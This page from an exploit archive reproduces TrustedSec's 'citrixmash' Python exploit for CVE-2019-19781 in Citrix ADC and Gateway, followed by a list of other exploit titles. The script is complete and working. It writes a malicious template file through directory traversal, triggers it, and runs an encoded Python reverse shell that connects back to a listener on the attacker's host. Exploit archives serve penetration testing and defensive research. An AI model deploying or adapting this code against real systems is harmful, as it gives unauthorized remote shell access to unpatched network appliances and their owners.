Search for hundreds of thousands of exploits

"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution"

Author

Exploit author

TrustedSec

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-01-11

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
#!/usr/bin/python3
#
# Exploits the Citrix Directory Traversal Bug: CVE-2019-19781
#
# You only need a listener like netcat to catch the shell.
#
# Shout out to the team: Rob Simon, Justin Elze, Logan Sampson, Geoff Walton, Christopher Paschen, Kevin Haubris, Scott White
#
# Tool Written by: Rob Simon and David Kennedy

import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings
import random
import string
import time
from random import randint
import argparse
import sys

# random string generator
def randomString(stringLength=10):
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(stringLength))

# our random string for filename - will leave artifacts on system
filename = randomString()
randomuser = randomString()

# generate random number for the nonce
nonce = randint(5, 15) 

# this is our first stage which will write out the file through the Citrix traversal issue and the newbm.pl script
# note that the file location will be in /netscaler/portal/templates/filename.xml
def stage1(filename, randomuser, nonce, victimip, victimport, attackerip, attackerport):

    # encoding our payload stub for one netcat listener - awesome work here Rob Simon (KC)
    encoded = ""
    i=0
    text = ("""python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'""" % (attackerip, attackerport))
    while i < len(text):
        encoded = encoded + "chr("+str(ord(text[i]))+") . "
        i += 1
    encoded = encoded[:-3]
    payload="[% template.new({'BLOCK'='print readpipe(" + encoded + ")'})%]"
    headers = ( 
        {
            'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',
            'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename),
            'NSC_NONCE' : '%s' % (nonce),
        })

    data = (
        {
            "url" : "127.0.0.1",
            "title" : payload,
            "desc" : "desc",
            "UI_inuse" : "a"
        })

    url = ("https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl" % (victimip, victimport))
    requests.post(url, data=data, headers=headers, verify=False)

# this is our second stage that triggers the exploit for us
def stage2(filename, randomuser, nonce, victimip, victimport):
    headers = (
        {
            'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',
            'NSC_USER' : '%s' % (randomuser),
            'NSC_NONCE' : '%s' % (nonce),
        })

    requests.get("https://%s:%s/vpn/../vpns/portal/%s.xml" % (victimip, victimport, filename), headers=headers, verify=False)


# start our main code to execute
print('''

  .o oOOOOOOOo                                            OOOo
    Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOOOO
    OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'OO
    OOP.oOOOOOOOOOOO "POOOOOOOOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOB'
    `O'OOOO'     `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO'    `OOOOo
    .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
    OOOOO                 '"OOOOOOOOOOOOOOOO"`                oOO
   oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
  oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
 OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
 "OOOO"       "YOoOOOOMOIONODOO"`  .   '"OOROAOPOEOOOoOY"     "OOO"
    Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
    :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?         .
    .            oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
                 '%o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
                      `$"  `OOOO' `O"Y ' `OOOO'  o             .
    .                  .     OP"          : o     .
                              :

Citrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781
Tool Written by: Rob Simon and Dave Kennedy
Contributions: The TrustedSec Team 
Website: https://www.trustedsec.com
INFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/

This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used
to append files in an XML format to the victim machine. This in turn allows for remote code execution.

Be sure to cleanup these two file locations:
    /var/tmp/netscaler/portal/templates/
    /netscaler/portal/templates/

Usage:

python citrixmash.py <victimipaddress> <victimport> <attacker_listener> <attacker_port>\n''')

# parse our commands
parser = argparse.ArgumentParser()
parser.add_argument("target", help="the vulnerable server with Citrix (defaults https)")
parser.add_argument("targetport", help="the target server web port (normally on 443)")
parser.add_argument("attackerip", help="the attackers reverse listener IP address")
parser.add_argument("attackerport", help="the attackersa reverse listener port")
args = parser.parse_args()
print("[*] Firing STAGE1 POST request to create the XML template exploit to disk...")
print("[*] Saving filename as %s.xml on the victim machine..." % (filename))
# trigger our first post
stage1(filename, randomuser, nonce, args.target, args.targetport, args.attackerip, args.attackerport)
print("[*] Sleeping for 2 seconds to ensure file is written before we call it...")
time.sleep(2)
print("[*] Triggering GET request for the newly created file with a listener waiting...")
print("[*] Shell should now be in your listener... enjoy. Keep this window open..")
print("[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/")
# trigger our second post
stage2(filename, randomuser, nonce, args.target, args.targetport)
Release DateTitleTypePlatformAuthor
2020-07-07"BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation"webappsmultiple"William Summerhill"
2020-07-06"RSA IG&L Aveksa 7.1.1 - Remote Code Execution"webappsmultiple"Jakub Palaczynski"
2020-07-02"OCS Inventory NG 2.7 - Remote Code Execution"webappsmultipleAskar
2020-06-24"BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting"webappsmultiple"William Summerhill"
2020-06-22"WebPort 1.19.1 - Reflected Cross-Site Scripting"webappsmultiple"Emre Γ–VÜNΓ‡"
2020-06-22"FileRun 2019.05.21 - Reflected Cross-Site Scripting"webappsmultiple"Emre Γ–VÜNΓ‡"
2020-06-22"Odoo 12.0 - Local File Inclusion"webappsmultiple"Emre Γ–VÜNΓ‡"
2020-06-17"OpenCTI 3.3.1 - Directory Traversal"webappsmultiple"Raif Berkay Dincel"
2020-06-15"SOS JobScheduler 1.13.3 - Stored Password Decryption"remotemultiple"Sander Ubink"
2020-06-12"SmarterMail 16 - Arbitrary File Upload"webappsmultiplevvhack.org
Release DateTitleTypePlatformAuthor
2020-01-11"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution"webappsmultipleTrustedSec
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47902/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.